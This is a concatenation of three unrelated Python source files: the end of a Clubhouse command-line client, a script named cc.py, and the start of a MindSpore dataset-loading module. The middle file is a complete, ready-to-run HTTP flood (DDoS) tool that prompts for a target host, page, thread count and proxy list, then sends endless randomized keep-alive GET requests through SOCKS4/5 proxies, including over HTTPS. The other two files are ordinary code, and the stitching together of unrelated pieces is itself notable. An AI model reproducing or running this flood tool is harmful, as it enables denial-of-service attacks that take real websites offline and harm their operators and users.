Suggested_follows_all(client)
elif _menu == 9:
nameSetting(client)
elif _menu == 10:
Profile(client)
elif _menu == 11:
getOnlineFriends(client)
elif _menu == 12:
getProfile(client)
elif _menu == 13:
searchClubs(client)
elif _menu == 14:
getTopics(client)
elif _menu == 15:
addInterest(client)
elif _menu == 16:
rmInterest(client)
return
def noTi(client):
_res = client.get_notifications()
print(colored("[!] notifications : ",'yellow') + str(_res['count']))
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("No.")
table.add_column("Noti_id", style="cyan", justify="right")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("type")
table.add_column("name")
table.add_column("message")
users = _res['notifications']
i = 0
for user in users:
i += 1
if i > int(_res['count']):
break
table.add_row(
str(i),
str(user['notification_id']),
str(user['user_profile']['user_id']),
str(user['user_profile']['username']),
str(user['type']),
str(user['user_profile']['name']),
str(user['message']),
)
console.print(table)
print("=" * 30)
return
def main():
"""
Initialize required configurations, start with some basic stuff.
"""
# Initialize configuration
client = None
user_config = read_config()
user_id = user_config.get('user_id')
user_token = user_config.get('user_token')
user_device = user_config.get('user_device')
name = user_config.get('name')
username = user_config.get('username')
# Check if user is authenticated
if user_id and user_token and user_device:
client = Clubhouse(
user_id=user_id,
user_token=user_token,
user_device=user_device
)
# Check if user is still on the waitlist
_check = client.check_waitlist_status()
if _check['is_waitlisted']:
print("[!] You're still on the waitlist. Find your friends to get yourself in.")
return
# Check if user has not signed up yet.
_check = client.me()
if not _check['user_profile'].get("username"):
process_onboarding(client)
_res = client.me()
num_invites = _res['num_invites']
print("=" * 30)
print(colored("Club House Command V1",'yellow'))
print("=" * 30)
print("[!] ID : " + user_id)
print("[!] name : " + name)
print("[!] username : @" + username)
print("[!] invites : " + str(num_invites))
print("=" * 30)
noTi(client)
getOnlineFriends(client)
menu(client)
else:
client = Clubhouse()
user_authentication(client)
main()
if __name__ == "__main__":
try:
main()
except Exception:
# Remove dump files on exit.
file_list = os.listdir(".")
for _file in file_list:
if _file.endswith(".dmp"):
os.remove(_file)
|
cc.py
|
#!/usr/bin/python3
#Coded by Leeon123
import socket
import socks
import time
import random
import threading
import sys
import ssl
print ('''
____ ____ _ _ _ _
/ ___/ ___| / \ | |_| |_ __ _ ___| | __
| | | | _____ / _ \| __| __/ _` |/ __| |/ /
| |__| |__|_____/ ___ \ |_| || (_| | (__| <
\____\____| /_/ \_\__|\__\__,_|\___|_|\_\\
Python3 version 1.2.1 (Support Https)
Cobed by Lee0n123
>---------------------------------------------<
If you want to stop
this script, pls just
close the window.
>---------------------------------------------<''')
useragents=["Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1",
"Mozilla/5.0 (Android; Linux armv7l; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3",
"Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax)",
"Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: )",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5",
"Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20",
"Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a",
"Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2",
"Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1",
"Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 ",
"Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0",
"Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0",
"Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5",
"Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:11.0a2) Gecko/20111230 Firefox/11.0a2 Iceweasel/11.0a2",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1",
"Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15",
"Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko",
"Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16",
"Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025",
"Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1",
"Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1",
"Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu)",
"Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8",
"Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5",
"Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330",
"Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox)",
"Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8",
"Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0",
"Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9",
"Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12",
"Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0",
"Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15",
"Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3",
"Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8",
"Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3",
"Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0",
"Mozilla/5.0 (Linux; Android 7.1.1; MI 6 Build/NMF26X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/043807 Mobile Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 7.1.1; OD103 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (Linux; Android 6.0.1; SM919 Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1.1; vivo X6S A Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (Linux; Android 5.1; HUAWEI TAG-AL00 Build/HUAWEITAG-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043622 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13F69 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_2 like Mac https://m.baidu.com/mip/c/s/zhangzifan.com/wechat-user-agent.htmlOS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Mobile/15C202 MicroMessenger/6.6.1 NetType/4G Language/zh_CN",
"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_1 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Mobile/15B150 MicroMessenger/6.6.1 NetType/WIFI Language/zh_CN",
"Mozilla/5.0 (iphone x Build/MXB48T; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/53.0.2785.49 Mobile MQQBrowser/6.2 TBS/043632 Safari/537.36 MicroMessenger/6.6.1.1220(0x26060135) NetType/WIFI Language/zh_CN",]
ip = str(input("> Host/Ip:"))
https = str(input("> Https(y/n):"))
url = str(input("> Page you want to attack(default=/)"))# add new function
port = int(input("> Port(Https default is 443):"))
thread_num = int(input("> Threads:"))
out_file = str(input("> Proxy file path(proxy.txt):"))
print ("> Number Of Proxies: %s" %(len(open(out_file).readlines())))
time.sleep(0.3)
multiple = int(input("> Input the Magnification:"))
#For those who don't know what is the page you want to attack :)
if url == '':
url2 = "/"
else:
url2 = str(url)
acceptall = [
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"Accept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\n",
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: iso-8859-1\r\nAccept-Encoding: gzip\r\n",
"Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n",
"Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html, application/xhtml+xml, image/jxr, */*\r\nAccept-Encoding: gzip\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Encoding: gzip\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Charset: utf-8, iso-8859-1;q=0.5\r\n,"
"Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n",
"Accept-Charset: utf-8, iso-8859-1;q=0.5\r\nAccept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1\r\n",
"Accept: text/html, application/xhtml+xml",
"Accept-Language: en-US,en;q=0.5\r\n",
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1\r\n",
"Accept: text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: iso-8859-1\r\n",]
proxies = open(out_file).readlines()
def run():
get_host = "GET " + url2 + " HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = random.choice(acceptall)
request = get_host + useragent + accept + connection + "\r\n"
proxy = random.choice(proxies).strip().split(":")
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
s.send(str.encode(request))
print (str(proxy[0]+":"+proxy[1])+"<>---------<>Request Send!!!")
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
s = socks.socksocket()
s.connect((str(ip), int(port)))
s.send(str.encode(request))
print (str(proxy[0]+":"+proxy[1])+"<>---------<>Request Send!!!\r\n")
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
print ("<ERROR>----<socks down>")
s.close()
def run2():
get_host = "GET " + url2 + " HTTP/1.1\r\nHost: " + ip + "\r\n"
connection = "Connection: Keep-Alive\r\n"
useragent = "User-Agent: " + random.choice(useragents) + "\r\n"
accept = random.choice(acceptall)
request = get_host + useragent + accept + connection + "\r\n"
proxy = random.choice(proxies).strip().split(":")
while True:
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, str(proxy[0]), int(proxy[1]), True)
s = ssl.wrap_socket(socks.socksocket())
s.connect((str(ip), int(port)))
s.send(str.encode(request))
print (str(proxy[0]+":"+proxy[1])+"<>---------<>Request Send!!!")
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
s.close()
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, str(proxy[0]), int(proxy[1]), True)
s = ssl.wrap_socket(socks.socksocket())
s.connect((str(ip), int(port)))
s.send(str.encode(request))
print (str(proxy[0]+":"+proxy[1])+"<>---------<>Request Send!!!\r\n")
try:
for y in range(multiple):
s.send(str.encode(request))
except:
s.close()
except:
print ("<ERROR>----<socks down>")
s.close()
if https == "y":
for i in range(thread_num):
th = threading.Thread(target = run2)
th.start()
else:
for i in range(thread_num):
th = threading.Thread(target = run)
th.start()
|
datasets.py
|
# Copyright 2019-2022 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
1. This file is an abstraction of the dataset loading class. It contains
some basic dataset operations(skip, filter, map, batch, ...).
2. Specific dataset loading classes can be found in datasets_vision.py, datasets_text.py,
datasets_audio.py, datasets_standard_format.py and dataets_user_defined.py files.
datasets_vision.py: contains vision dataset loading classes.
datasets_text.py: contains text dataset loading classes.
datasets_audio.py: contains audio dataset loading classes.
datasets_standard_format.py: contains standard format loading classes which
any other kinds of datasets can be converted to.
dataets_user_defined.py: contains basic classes that help users to define
flexible ways to load dataset.
"""
import atexit
import glob
import json
import os
import signal
import stat
import time
import uuid
import multiprocessing
from multiprocessing.pool import RUN, TERMINATE
from enum import Enum
from importlib import import_module
import sys
import threading
import copy
import weakref
import platform
import psutil
import numpy as np
import mindspore._c_dataengine as cde
from mindspore._c_expression import typing
from mindspore import log as logger
from mindspore.parallel._ps_context import _is_role_pserver, _is_role_sched
from mindspore.dataset.engine.offload import GetOffloadModel
import mindspore.dataset.transforms.py_transforms as py_transforms
from mindspore.dataset.text.utils import SentencePieceModel, DE_C_INTER_SENTENCEPIECE_MODE
from mindspore.parallel._utils import _get_device_num
from . import samplers
from .iterators import DictIterator, TupleIterator, DummyIterator, check_iterator_cleanup, _set_iterator_cleanup, \
ITERATORS_LIST, _unset_iterator_cleanup
from .queue import _SharedQueue
from .validators import check_batch, check_shuffle, check_map, check_filter, check_repeat, check_skip, check_zip, \
check_rename, check_device_send, check_take, check_project, \
check_sync_wait, check_zip_dataset, check_add_column, check_concat, check_split, check_bucket_batch_by_length, \
check_save, check_tuple_iterator, check_dict_iterator, check_schema, check_to_device_send
from ..core.config import get_callback_timeout, _init_device_info, get_enable_shared_mem, get_num_parallel_workers
from ..core.datatypes import mstype_to_detype
from ..core.validator_helpers import replace_none
from ..core.py_util_helpers import ExceptionHandler
from ..transforms.py_transforms_util import FuncWrapper
try:
context = import_module("mindspore.context")
except ModuleNotFoundError:
context = None
if platform.system().lower() == "darwin" and multiprocessing.get_start_method() != "fork":
multiprocessing.set_start_method("fork", True)
OffloadToManualOffloadMode = {
None: cde.ManualOffloadMode.UNSPECIFIED,
False: cde.ManualOffloadMode.DISABLED,
True: cde.ManualOffloadMode.ENABLED
}
_train_dataset = None
def _set_training_dataset(dataset):
"""
Set the dataset to be used when training recovery has occurred.
Args:
dataset: the training dataset or iterator
"""
global _train_dataset
_train_dataset = dataset
def _get_training_dataset():
"""
Get the dataset to be used when training recovery has occurred.
Returns:
training dataset/iterator
"""
return _train_dataset
def _reset_training_dataset(step):
"""
Reset the training dataset to the given step number.
Args:
step (int): Global step number.
"""
dataset = _get_training_dataset()
if dataset is not None:
dataset.reset(step)
else:
raise RuntimeError("Training dataset is not set.")
class Shuffle(str, Enum):
"""Specify the shuffle mode.
- GLOBAL: Shuffle both the files and samples.
- FILES: Shuffle files only.
- INFILE: Shuffle data within each file.
"""
GLOBAL: str = "global"
